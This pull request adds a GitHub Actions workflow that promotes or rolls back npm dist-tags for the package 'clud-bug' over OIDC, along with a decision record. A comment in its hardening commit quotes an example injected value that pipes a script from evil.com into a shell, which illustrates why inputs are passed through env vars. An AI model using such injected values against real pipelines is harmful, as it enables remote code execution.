### PR TITLE
ci: npm-dist-tag workflow (promote/rollback via OIDC)

### DIFF
--- a/.github/workflows/npm-dist-tag.yml
+++ b/.github/workflows/npm-dist-tag.yml
@@ -1,0 +1,59 @@
+name: npm dist-tag
+
+# Manually re-point an npm dist-tag (typically `latest`) to a specific
+# already-published version. Uses the same OIDC trusted-publisher
+# integration as npm-publish.yml — no NPM_TOKEN needed.
+#
+# Reach for this when:
+#   - Backfilling old tags via workflow_dispatch finished out of order
+#     and the wrong version got promoted to `latest`.
+#   - You want to roll `latest` back to a previous version (e.g. an
+#     emergency yank where deprecate is too soft and unpublish is too
+#     destructive).
+#
+# Trusted publisher must be configured for this workflow filename too:
+#   npmjs.com/package/clud-bug → Settings → Add Trusted Publisher →
+#   Workflow filename: npm-dist-tag.yml.
+
+on:
+  workflow_dispatch:
+    inputs:
+      version:
+        description: 'Version to point the dist-tag at (e.g. 0.5.2 — no leading v)'
+        required: true
+        type: string
+      tag:
+        description: 'Dist-tag name (default: latest)'
+        required: false
+        default: 'latest'
+        type: string
+
+permissions: {}
+
+jobs:
+  promote:
+    runs-on: ubuntu-latest
+    permissions:
+      contents: read
+      id-token: write
+    env:
+      FORCE_JAVASCRIPT_ACTIONS_TO_NODE24: 'true'
+    steps:
+      - uses: actions/setup-node@v5
+        with:
+          node-version: '20'
+          registry-url: 'https://registry.npmjs.org'
+
+      - name: Upgrade npm to a Trusted-Publishing-capable version
+        # Same reason as npm-publish.yml: npm 10.x signs via OIDC but
+        # auths the actual registry call via NPM_TOKEN. dist-tag is
+        # one of those calls. Need 11.5.1+.
+        run: npm install -g npm@latest
+
+      - name: Promote
+        run: |
+          set -e
+          echo "Pointing dist-tag '${{ inputs.tag }}' at clud-bug@${{ inputs.version }}"
+          npm dist-tag add "clud-bug@${{ inputs.version }}" "${{ inputs.tag }}"
+          echo "---"
+          npm dist-tag ls clud-bug

--- a/.github/workflows/npm-dist-tag.yml
+++ b/.github/workflows/npm-dist-tag.yml
@@ -51,9 +51,20 @@ jobs:
         run: npm install -g npm@latest
 
       - name: Promote
+        # Inputs piped via env vars rather than inlined as ${{ inputs.* }}
+        # in the script body. Direct ${{ }} interpolation gets substituted
+        # into the bash source BEFORE bash parses it, so a value like
+        #   0.5.2"; curl evil.com|sh; "
+        # would break out of the quoted arg and execute. Even though only
+        # repo maintainers can trigger workflow_dispatch, the env-var
+        # pattern is the standard way to eliminate this entire class of
+        # issue. See docs.github.com/en/actions/security-guides.
+        env:
+          VERSION: ${{ inputs.version }}
+          TAG: ${{ inputs.tag }}
         run: |
           set -e
-          echo "Pointing dist-tag '${{ inputs.tag }}' at clud-bug@${{ inputs.version }}"
-          npm dist-tag add "clud-bug@${{ inputs.version }}" "${{ inputs.tag }}"
+          echo "Pointing dist-tag '${TAG}' at clud-bug@${VERSION}"
+          npm dist-tag add "clud-bug@${VERSION}" "${TAG}"
           echo "---"
           npm dist-tag ls clud-bug

--- a/docs/decisions-branches/ci__npm-dist-tag-promote.md
+++ b/docs/decisions-branches/ci__npm-dist-tag-promote.md
@@ -1,0 +1,11 @@
+## 2026-05-15 15:02 - Add npm-dist-tag workflow as the recovery seam for out-of-order publishes
+
+**Reasoning:** Separate workflow file rather than a flag on npm-publish.yml because: (a) keeps the audit trail clean (a dist-tag move shows up as its own workflow run, not buried in a publish run), (b) requires its own trusted-publisher entry on npm so a compromised publish workflow can't also rewrite tags, (c) inputs are different shape — version+tag, not just tag.
+
+**Alternatives considered:** Just have user run 'npm dist-tag add' locally — rejected because their npm 2FA is passkey-based, no easy CLI flow. Same reason we did Trusted Publishing in the first place., Add a 'fix dist-tag' step to npm-publish.yml that always runs — rejected because that conflates publish concerns with tag-management concerns and would require either re-publishing (which fails on existing versions) or a publish-skipping branch in the same workflow.
+
+**Implications:**
+- Requires a second trusted-publisher entry on npm: thrillmot/clud-bug, workflow npm-dist-tag.yml, blank environment. Owner action — flagged in PR 37 description.
+- Future use: roll latest forward to a new version after a botched parallel backfill, OR roll back if a release is yanked (deprecate is too soft, unpublish is too destructive — dist-tag rollback to previous version is the middle ground).
+
+---


### PR DESCRIPTION
Stream A2 backfilled v0.4.1, v0.5.0, v0.5.1, v0.5.2 via parallel workflow_dispatch. They finished out of order so npm 'latest' is at v0.5.1 instead of v0.5.2.

This workflow lets you manually re-point any dist-tag at any already-published version using the same OIDC trusted-publisher integration as npm-publish.yml.

**You'll need to add a second trusted publisher entry** at npmjs.com/package/clud-bug → Settings → Add Trusted Publisher → Workflow filename: `npm-dist-tag.yml` (same owner/repo, blank environment). After that, I trigger it once with version=0.5.2 and 'latest' moves.